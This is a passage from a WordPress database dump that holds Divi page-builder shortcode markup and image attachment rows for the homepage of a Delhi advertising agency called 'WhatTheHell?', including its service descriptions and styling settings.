button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:51:43','2020-08-07 14:51:43','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(489,1,'2020-08-07 14:56:53','2020-08-07 14:56:53','digital agency in delhi ','packaging design by what the hell','','inherit','open','closed','','800x800-w','','','2021-03-18 06:21:32','2021-03-18 06:21:32','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg',0,'attachment','image/jpeg',0),(490,1,'2020-08-07 14:57:13','2020-08-07 14:57:13','creative agency in delhi','800x400','','inherit','open','closed','','800x400','','','2021-03-18 06:22:40','2021-03-18 06:22:40','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg',0,'attachment','image/jpeg',0),(491,1,'2020-08-07 14:57:24','2020-08-07 14:57:24','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" 